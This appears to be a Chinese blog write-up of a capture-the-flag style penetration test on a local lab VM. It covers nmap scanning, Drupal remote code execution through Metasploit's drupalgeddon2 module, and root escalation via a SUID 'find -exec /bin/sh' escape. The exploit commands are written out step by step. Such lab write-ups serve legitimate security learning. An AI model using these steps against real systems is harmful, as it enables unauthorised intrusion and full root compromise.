记一次对靶机完整的渗透测试

最新推荐文章于 2023-03-24 15:27:32 发布
最新推荐文章于 2023-03-24 15:27:32 发布
阅读量262 收藏
点赞数 1
文章标签: java 开发语言 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45501227/article/details/127469646
版权

实验环境:

BC1:192.168.56.93

攻击机:192.168.56.103

第一步信息收集把靶机导入进虚拟机,导入的时候可能会出现打不开的现象,一般是虚拟机系统版本不一致导致的,把.vmx结尾的文件里面的virtualhw.version = "16" 改成自己虚拟机对应的版本即可。

打开靶机啥也没有,只有一个登录系统界面,当然也可以直接破解密码然后直接拿到flag。但我们的目的并不是这样,题目主要目的是找到finalflag ,好了废话不多说开搞。

在kali攻击机上使用nmap命令查找存活的ip,一共四个一个攻击机一个主机一个手机那另一个vm标识的就是我们的靶机了。

 

 

第二步我们拿到ip后使用nmap扫一下看看开了哪些端口

 

开放了80 在浏览器打开看看,发现一个登录界面,我首先想到的是试试爆破,奈何我比较懒,这套系统有点眼熟,于是就用wappayzer 看了下,果然是durpal内容管理系统知道了所属cms,直接上msf。

运行msf

msfconsole

search durpal

可以看到历史漏洞还是挺多的

use exploit/unix/webapp/drupal_drupalgeddon2  

看一下所需要的参数

show options

给个rhost就可以利用了还是很方便,

set rhost 192.168.56.93

run

过一会已经建立会话了

就这么简单?ls一下发现flag1 ,但我们的最终目标是拿到finalflag,进root看看发现没有权限,果然没那么简单

第三步尝试提权;

本来想用脏牛的但我太懒于是就用find命令了

使用find命令查找suid文件,

find / -user root -perm -4000 2>/dev/null

随便创建一个文件在tmp下

cd /tmp

touch 123

find 123 -exec whoami \;

find 123 -exec /bin/sh \;

然后直接whoami

提权成功进入root下可以看到finalflag

到这就算完成了,这只能说是其中一种方式,也是最简单粗暴的,当然也有很多其他的方式,后续会持续更新。

我像一条狗
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
一次靶机完整渗透测试(二)
胖虎的博客
10-25 611
一次靶机完整渗透测试(二)
2021-12-03 kali渗透----Raven靶机
夕阳的街道的博客
12-03 2669
本文章仅供学习和参考! 欢迎交流~ 一、实验题目:kali渗透----Raven靶机 二、实验内容: 1. 信息收集 2. ssh爆破 3. 绕过限制sudo提权 4. wpscan扫描worpress cms 5. PHPMailer远程代码执行getshell 三、环境准备: 1. kali虚拟机:(IP:192.168.112.130) 2. Raven靶机:(IP:192.168.112.137) 四、实验步骤: 1. 信息收集: (1)端口扫描.
对DC-7靶机进行渗透测试
zll___的博客
03-24 254
对DC-7靶机进行渗透测试
靶机简单渗透测试
KKK_2178的博客
11-22 5503
1.下载靶机Metasploitable2-Linux,下载地址:Metasploitable download | SourceForge.net 2.在虚拟机中打开Kali-Linux和下载好的Metasploitable2-Linux,Metasploitable2-Linux的账号:msfadmin,密码:msfadmin. 3.在靶机中输入指令ifconfig,得到靶机ip 4.返回Kali虚拟机操作 输入指令nmap xxxxx (xxxxx为你靶机的ip)查看靶机端口.
DC-6靶机测试渗透详细教程
wwxxss
10-26 1285
DC-6的靶场详细渗透过程
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(六)covfefe [简单的利用缓冲区溢出提权]
hyjcking的博客
12-01 626
然后我们去访问.ssh目录,发现了三个文件,这三个文件分别对应着公钥、已接受的认证公钥、公钥,我们用kali自带的游览器将三个文件全部下载下来查看。这里发现了几个主要目录robots.txt和.ssh,我们先访问robots.txt,发现有三个目录,依次访问,在第三个目录中找到flag1。找到了usr目录里可读可写可执行的文件read.message,然后./运行它,发现需要我们输入正确的用户名,我们输入Simon后出现一封信。使用nmap对目标靶机端口进行探测,发现开启了22,80,31337端口。
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
实训渗透靶场02|3星vh-lll靶机|vulnhub靶场Node1
Q_U_A_R_T_E_R的博客
06-15 1060
3000端口是node对node.js稍有了解的都知道 3000是node.js的默认端口,简单的说 Node.js 就是运行在服务端的 JavaScript。Node.js 是一个基于Chrome JavaScript 运行时建立的一个平台。Node.js是一个事件驱动I/O服务端JavaScript环境,基于Google的V8引擎,V8引擎执行Javascript的...
DC-1靶机渗透(教程以及思路)
菜菜的博客
10-20 2871
一般来说这样的端口,我会先从80端口开始,看是否存在登录页面,是否存在弱口令,是否存在sql注入,dirb遍历目录,查看是否有可疑的目录,使用指纹识别查看cms版本是否存在漏洞。我这里因为靶机出了点问题,连不进去了,一般来说那个网站的密码都会是在库里面,有一个name,还有一个password,用来进行登入网站后台。因为是Linux那么我们接下来输入的命令也得是Linux的,ls查看一下有什么文件,发现有一个flag1.txt,查看。发现开启了4个端口,分别是22,80,111,45186。
看完这篇 教你玩转渗透测试靶机vulnhub——HackNos-2.1
Aluxian_的博客
10-22 1154
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。拿到shell 获取最终的flag,只有拿到root权限才可以发现最终的flag。1.信息收集,端口扫描2.文件包含的利用3.john爆破获取密码4.Sudo su提权这个靶机比较简单啦 希望对刚入门得小白有帮助!🙂最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
利用Kali 完成一次简单的渗透
热门推荐
qq_50905066的博客
03-20 3万+
这里我们需要两台虚拟机。一台Kali 作为攻击机,一台Ubuntu作为靶机。 如图: 渗透的话我们需要先得到靶机的ip 地址才能进行扫描。因为是虚拟机,只要我们知道了Kali 的ip 的地址,扫描其所在网段就可以获得靶机的地址了。 如图: 通过使用Kali自带的扫描工具执行Namp -sP 192.168.161.1/24就可以扫到了。这里我们排出太小的地址和太大的地址以及攻击的地址就可以确定靶机的地址了。 在得到靶机的地址之后,我们就可以进一步扫描靶机端口,从其中获得靶机开启的端口和..
内网安全-隧道穿透漫游
m0_67105288的博客
02-23 626
隧道穿透与端口转发 什么是隧道? 在渗透测试中,进入内网后,我们要判断流量是否能够出的去、进的来。 在实际的网络情况下,流量会经过很多的边界设备,在一般的企业内网中,可能会存在 IDP、IPS、防火墙等设备,如果异常的话,就会直接将通信阻断;这里我们说的隧道,就是绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方通信。当被封装的数据包达到了另外的地址的时候,解包还原,并将还原后的数据包发送到相应的服务器上。 常见的隧道包括三个大类:网络层、应用
系统漏洞解析含flag
旺仔Sec&blog
02-24 5194
6. 通过本地 PC 中渗透测试平台 Kali 下载 flag.txt 文件,将文件中的 Flag。1. 通过本地 PC 中渗透测试平台 Kali 查看目标靶机共享的目录及 IP 地址白名。2. 通过本地 PC 中渗透测试平台 Kali 查看目标靶机共享的目录及 IP 地址白名。3. 通过本地 PC 中渗透测试平台 Kali 渗透进入目标靶机,将挂载目标靶机文。单(将 IP 地址替换为 0.0.0.0) ,将查看命令作为 Flag 提交;文件系统中该文件的位置,并将搜索所需命令作为 Flag 提交;
Kali系统渗透靶机(物理机)的详细过程
哆啦A梦
03-21 6199
Kali系统渗透靶机
靶机渗透测试4
qq_52191935的博客
09-01 1281
测试环境:靶机+kali 1.nmap扫描存活主机,得到靶机IP为192.168.152.131 2.对靶机进行全端口扫描,发现80端口(HTTP)及7744端口(SSH)开放 3.根据下载时的提示,要设置hosts文件才能访问到网站 先修改hosts文件,在linux中路径为/etc/hosts,添加如下配置 配置完成后访问80端口,发现访问成功 4.通过网页查看到第一个flag,并得到提示可以使用cewl 5.通过kail的cewl工具生成密码字典,为了便于使用...
python实现对靶机渗透测试
最新发布
06-03
靶机进行渗透测试需要掌握一定的安全知识和工具使用技巧,以下是一个简单的基于Python的渗透测试脚本示例: ```python import socket # 靶机IP地址和端口号 target_ip = "192.168.1.100" target_port = 80 # ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我像一条狗

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值